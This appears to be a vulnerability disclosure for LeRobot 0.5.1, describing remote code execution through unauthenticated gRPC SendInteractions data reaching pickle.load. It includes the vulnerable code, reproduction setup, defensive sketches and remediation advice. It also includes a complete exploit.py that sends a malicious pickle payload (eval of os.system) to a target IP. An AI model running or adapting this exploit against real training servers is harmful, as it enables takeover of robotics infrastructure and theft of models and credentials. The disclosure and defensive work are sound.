LeRobot - Version 0.5.1 / Remote Code Execution (RCE) via Insecure Deserialization: gRPC SendInteractions stream data in LearnerService reaches a pickle.load sink
Below is one (1) way to reproduce the RCE in LeRobot using a remote exploit that the attacker delivers over the network. No third party has to modify files locally on the victim for code to execute during deserialization.
For this PoC, two (2) different devices were used to simulate the interaction between an attacking machine (Raspberry Pi with IP 192.168.1.90) and a victim machine (Windows with IP 192.168.1.88).
Note: While this vulnerability is specifically verified and reported on version 0.5.1, other prior and subsequent versions may also be susceptible to this insecure deserialization vector.
Introduction
LeRobot is Hugging Face's open-source library for state-of-the-art Real-world Robotics. It provides models, datasets, and simulation environments designed to democratize access to robotics AI research, allowing researchers and developers to train policies on simulation environments and transfer them directly to physical robots.
A core component of distributed robotics learning architectures is the Learner node, which coordinates policy optimization across multiple physical robot clients (Actors). Safe design of transport pipelines is crucial for preventing host machine compromise and physical control hijacking.
Vulnerability description
The LearnerService in LeRobot v0.5.1 is part of the distributed HIL-SERL (Human-in-the-Loop Sample-Efficient Robotic Reinforcement Learning) training architecture, which LeRobot trains with a Soft Actor-Critic (SAC) policy. It enables remote "Actors" (robot clients) to send episodic interaction data to a central "Learner" (server) for processing and model updates.
This service is exposed via gRPC on port 50051 by default and is completely unauthenticated. The SendInteractions method accepts a stream of data that is reassembled and then passed to an insecure pickle.load sink (bytes_to_python_object). An attacker can spoof an Actor instance and send a malicious serialized object, achieving Remote Code Execution (RCE) on the central training server.
The vulnerable code in lerobot/transport/utils.py (Sink):
def bytes_to_python_object(buffer: bytes) -> Any:
    bytes_buffer = io.BytesIO(buffer)
    bytes_buffer.seek(0)
    obj = pickle.load(bytes_buffer)  # nosec B301: Safe usage of pickle.load
    # Add validation checks here
    return obj
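The inline comment places validation after the load, but pickle.load has already invoked any callable named in the stream by the time it returns. A minimal, harmless sketch of that behaviour follows; the class name Demo is hypothetical and the callable is the built-in sorted, chosen only because it has no side effects:

```python
import io
import pickle


class Demo:
    """Hypothetical class whose pickled form names a callable to run on load."""

    def __reduce__(self):
        # pickle records "call sorted([3, 1, 2])" instead of the object's state.
        return (sorted, ([3, 1, 2],))


buffer = pickle.dumps(Demo())

# Same pattern as bytes_to_python_object: wrap the bytes and call pickle.load.
obj = pickle.load(io.BytesIO(buffer))

# The loader called sorted() and returned its result, not a Demo instance.
print(type(obj).__name__, obj)  # prints: list [1, 2, 3]
```

Any check written after the pickle.load line therefore only inspects the return value of a call that has already happened.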
The vulnerable code in lerobot/rl/learner.py (Caller):
def process_interaction_message(
    message, interaction_step_shift: int, wandb_logger: WandBLogger | None = None
):
    """Process a single interaction message with consistent handling."""
    message = bytes_to_python_object(message)
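The caller hands network bytes straight to the sink, so any check has to run while the stream is being loaded rather than afterwards. The sketch below follows the "restricting globals" pattern from the Python pickle documentation. The names ALLOWED_GLOBALS and restricted_loads are hypothetical, and the single allow-list entry is only an illustration: real interaction messages may need other types, and an allow-list narrows the attack surface without making pickle safe for untrusted input.

```python
import io
import pickle

# Hypothetical allow-list of (module, name) pairs the loader may resolve.
# Plain dicts, lists, strings, and numbers need no entry at all.
ALLOWED_GLOBALS = frozenset({("collections", "OrderedDict")})


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the stream references a global; refuse unknown ones.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(buffer: bytes):
    """Drop-in analogue of pickle.loads that enforces ALLOWED_GLOBALS."""
    return RestrictedUnpickler(io.BytesIO(buffer)).load()


# A message built from primitives loads normally.
print(restricted_loads(pickle.dumps({"Interaction step": 0})))

# A stream that references a non-allow-listed global is rejected at load time.
try:
    restricted_loads(pickle.dumps(sorted))
except pickle.UnpicklingError as exc:
    print("rejected:", exc)
```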
Technical Impact Analysis
Project Purpose & Context
In distributed reinforcement learning, the Learner is the most critical infrastructure component, as it aggregates experience from multiple robots to update the global policy. The LearnerService facilitates this high-bandwidth data exchange, making it a natural but insecure entry point when deployed over network boundaries.
Platform & Deployment Environment
Typically deployed on high-performance Linux or Windows servers equipped with high-end GPUs. These servers are often exposed to a local research network where multiple robot clients (Actors) connect to stream training data during long-running experiments.
Comprehensive Risk Assessment
The risk is Critical. Compromise of the Learner allows an attacker to manipulate the learning process of multiple physical robots simultaneously. Additionally, the Learner environment often contains high-value assets such as proprietary reward functions, environment simulators, and cloud API keys (Hugging Face / WandB) stored for metrics logging and model checkpoints.
Attack Scenario
Who wants to exploit a particular vulnerability?
Adversaries targeting high-tech robotics firms, academic institutions conducting sensitive autonomous systems research, or any entity looking to compromise GPU-heavy infrastructure for lateral movement.
For what gain?
Intellectual property theft (policy architectures, trained weights), infrastructure hijacking (GPU compute resources), and the ability to inject backdoors into the learned behaviors of autonomous agents.
In what way?
By establishing a gRPC stream connection to the LearnerService (port 50051) and calling SendInteractions. The attacker sends a stream of bytes that, when reassembled by the victim, forms a malicious pickle object. The RCE is triggered as soon as the Learner's main loop processes the next message from its internal queue.
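The delay between the end of the stream and the moment of execution follows from the hand-off described above: the RPC handler only reassembles bytes and enqueues them, and deserialization happens later in the main loop. The following is a simplified model of that flow, not LeRobot's implementation. TransferState, reassemble, and the max_bytes cap are hypothetical stand-ins; only TRANSFER_END is named in this report.

```python
import queue
from enum import Enum


class TransferState(Enum):
    # Hypothetical stand-ins for the protobuf transfer states.
    BEGIN = 1
    MIDDLE = 2
    END = 3


def reassemble(chunks, out_queue, max_bytes=1_000_000):
    """Concatenate chunk payloads and enqueue the result when END arrives."""
    buffer = bytearray()
    for state, data in chunks:
        buffer.extend(data)
        # Size cap added for illustration; it bounds memory, nothing more.
        if len(buffer) > max_bytes:
            raise ValueError("message exceeds size limit")
        if state is TransferState.END:
            out_queue.put(bytes(buffer))
            buffer.clear()


interactions = queue.Queue()
reassemble(
    [
        (TransferState.BEGIN, b"ab"),
        (TransferState.MIDDLE, b"cd"),
        (TransferState.END, b"ef"),
    ],
    interactions,
)

# At this point the handler has returned and nothing has been deserialized.
# The main loop later dequeues the bytes and passes them to the deserializer.
message = interactions.get_nowait()
print(message)
```

In this model, a single chunk marked END is enough to enqueue a complete message, which matches the one-chunk stream used in the reproduction steps.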
Reproduction steps
On Windows (victim) - IP 192.168.1.88
(.venv) PS L:\Deserializer\PYPI-lerobot> Get-NetIPAddress -AddressFamily IPv4 | Where-Object PrefixOrigin -eq "Dhcp" | Select-Object -ExpandProperty IPAddress
192.168.1.88
1. Create a .venv, activate it, and install the latest updated version (0.5.1) of LeRobot using pip install lerobot.
2. Additionally, it is necessary to install grpcio and protobuf to create a complete testing environment: pip install grpcio protobuf.
3. Create a file named train_config.json with the following content:
{
  "job_name": "poc_hilserl",
  "output_dir": "outputs/poc_hilserl",
  "seed": 42,
  "dataset": {
    "repo_id": "lerobot/pusht"
  },
  "env": {
    "type": "pusht",
    "fps": 10
  },
  "wandb": {
    "enable": false
  },
  "policy": {
    "type": "sac",
    "n_obs_steps": 1,
    "push_to_hub": false,
    "input_features": {
      "observation.state": {
        "type": "STATE",
        "shape": [10]
      }
    },
    "output_features": {
      "action": {
        "type": "ACTION",
        "shape": [4]
      }
    },
    "actor_learner_config": {
      "learner_host": "0.0.0.0",
      "learner_port": 50051
    }
  }
}
4. Launch the Learner service:
python -m lerobot.rl.learner --config_path train_config.json
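With learner_host set to 0.0.0.0, the service listens on every network interface, which is what makes it reachable from the attacker machine. A small pre-launch check can flag that setting. This is a sketch only: the function name learner_bind_is_exposed is hypothetical, and the key path is taken from the train_config.json shown in step 3.

```python
import ipaddress
import json


def learner_bind_is_exposed(config: dict) -> bool:
    """Return True when learner_host is anything other than a loopback address."""
    host = config["policy"]["actor_learner_config"]["learner_host"]
    if host == "localhost":
        return False
    try:
        address = ipaddress.ip_address(host)
    except ValueError:
        # Hostnames other than localhost are conservatively treated as exposed.
        return True
    return not address.is_loopback


config = json.loads(
    '{"policy": {"actor_learner_config": '
    '{"learner_host": "0.0.0.0", "learner_port": 50051}}}'
)
print(learner_bind_is_exposed(config))  # prints: True
```

Binding to 127.0.0.1 limits exposure to the local host but does not remove the unsafe deserialization itself.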
On the Raspberry (attacker) - IP 192.168.1.90
kw0@kw0l4b:~ $ hostname -I | awk '{print $1}'
192.168.1.90
Create a file named exploit.py with the following content:
import grpc
import pickle
import os
import sys
import time
# Ensure lerobot modules are in path
from lerobot.transport import services_pb2, services_pb2_grpc
class RCE:
def __reduce__(self):
# Best Practice: Use 'eval' for self-containment and 'or {}'
# to ensure the unpickler returns a safe object type (dict).
return (eval, ("__import__('os').system('calc.exe') or {'Interaction step': 0}",))
def generate_messages(payload):
# The LearnerService.SendInteractions expects a stream of InteractionMessage
# It reassembles them using receive_bytes_in_chunks
# Send as one chunk for simplicity, or split if testing chunking
yield services_pb2.InteractionMessage(
transfer_state=services_pb2.TRANSFER_END, # Signals completion to trigger processing
data=payload
)
def exploit(target_ip="127.0.0.1", target_port=50051):
print(f"[*] Attacking LearnerService at {target_ip}:{target_port}...")
payload = pickle.dumps(RCE())
channel = grpc.insecure_channel(f"{target_ip}:{target_port}")
stub = services_pb2_grpc.LearnerServiceStub(channel)
print("[*] Initiating SendInteractions stream...")
try:
# Call the vulnerable streaming method
stub.SendInteractions(generate_messages(payload))
print("[+] Stream finished. Triggering processing...")
# We might need to wait a moment for the Learner main loop to pick it up from the queue
time.sleep(2)
print("[+] Check target for execution.")
except grpc.RpcError as e:
print(f"[!] gRPC Error: {e.details()}")
if __name__ == "__main__":
target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
exploit(target)
Run the exploit to trigger the RCE:
python exploit.py 192.168.1.88
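On the Windows victim machine, the Calculator window launched by the payload's calc.exe command confirms code execution inside the Learner process.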
Executive Summary: RCE via Insecure Pickle Deserialization in LeRobot LearnerService
The research identifies a critical Remote Code Execution (RCE) vulnerability in the LearnerService of LeRobot v0.5.1.
- Root Cause: The LearnerService exposes an unauthenticated gRPC SendInteractions method that reassembles stream data and passes it to an insecure pickle.load sink (bytes_to_python_object).
- Exploitation Mechanism: By establishing a gRPC connection to the default port (50051), an attacker can spoof an "Actor" node and transmit a crafted, malicious serialized object. The Learner service automatically deserializes this payload upon arrival in the main processing loop, resulting in immediate code execution.
Analysis of Scope and Security Implications
This vulnerability is of critical severity, as it targets the core infrastructure of distributed robotic training systems.
1. Infection Scenarios
- Distributed Infrastructure Hijacking: In a typical HIL-SERL deployment, the Learner acts as the central command node. An attacker who gains network access to the LearnerService port can execute arbitrary code on the high-performance GPU servers hosting the training process.
- Robot-to-Server Pivot: If a single robotic client ("Actor") is compromised via other means, the attacker can use that node to propagate the exploit to the central Learner, effectively poisoning the entire training pipeline.
2. Factors Exacerbating Risk
- Zero Authentication: The gRPC service operates without any authentication mechanisms, meaning any device on the network can interact with the Learner and trigger the vulnerable deserialization sink.
- High-Value Target Environment: These systems often handle sensitive intellectual property, such as proprietary reward functions, trained model weights, and cloud provider credentials (e.g., Hugging Face, WandB) used for experiment logging, all of which are exposed to the attacker.
- Complex Dependencies: By compromising the Learner, an attacker can inject backdoors directly into the policy architectures being learned by the robots, leading to long-term impact on autonomous agent behavior.
Conclusion and Recommendation
This is a critical-severity vulnerability. The combination of network-exposed gRPC streams and pickle-based deserialization creates a direct path for complete system compromise.
Suggested actions for the development team:
- Remove Pickle: Immediately replace pickle.load in bytes_to_python_object with a secure, non-executable data serialization format, such as Protobuf or msgpack (with strict type validation).
- Implement Authentication: Add mandatory authentication (e.g., mutual TLS or API keys) to the gRPC SendInteractions method to prevent unauthorized access.
- Input Validation: If serialization must be complex, implement rigorous allow-listing and integrity signatures to ensure only data from trusted Actors is processed.
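As a rough illustration of the first and third suggestions combined, the sketch below swaps pickle for JSON, which cannot encode callables, and prefixes each message with an HMAC-SHA256 tag that is verified before parsing. It is not a patch for LeRobot. The names SHARED_KEY, encode_interaction, and decode_interaction are hypothetical, the key distribution scheme is assumed, and the "Interaction step" field is taken from the payload in the reproduction steps. Real messages would need a fuller schema.

```python
import hashlib
import hmac
import json

# Assumption: each trusted Actor shares this secret with the Learner out of band.
SHARED_KEY = b"replace-with-a-random-secret"
TAG_SIZE = hashlib.sha256().digest_size  # 32 bytes


def encode_interaction(message: dict, key: bytes = SHARED_KEY) -> bytes:
    """Serialize to JSON and prepend an HMAC-SHA256 tag over the body."""
    body = json.dumps(message, sort_keys=True).encode("utf-8")
    tag = hmac.new(key, body, hashlib.sha256).digest()
    return tag + body


def decode_interaction(buffer: bytes, key: bytes = SHARED_KEY) -> dict:
    """Verify the tag first, then parse and type-check the body."""
    tag, body = buffer[:TAG_SIZE], buffer[TAG_SIZE:]
    expected = hmac.new(key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("signature mismatch")
    message = json.loads(body.decode("utf-8"))
    if not isinstance(message, dict):
        raise ValueError("interaction message must be a JSON object")
    step = message.get("Interaction step")
    # bool is a subclass of int in Python, so exclude it explicitly.
    if isinstance(step, bool) or not isinstance(step, int):
        raise ValueError("'Interaction step' must be an integer")
    return message


wire = encode_interaction({"Interaction step": 3})
print(decode_interaction(wire))
```

A shared-secret signature only shows that the sender holds the key. Transport-level authentication such as mutual TLS is still needed to keep unauthenticated clients from reaching the method at all.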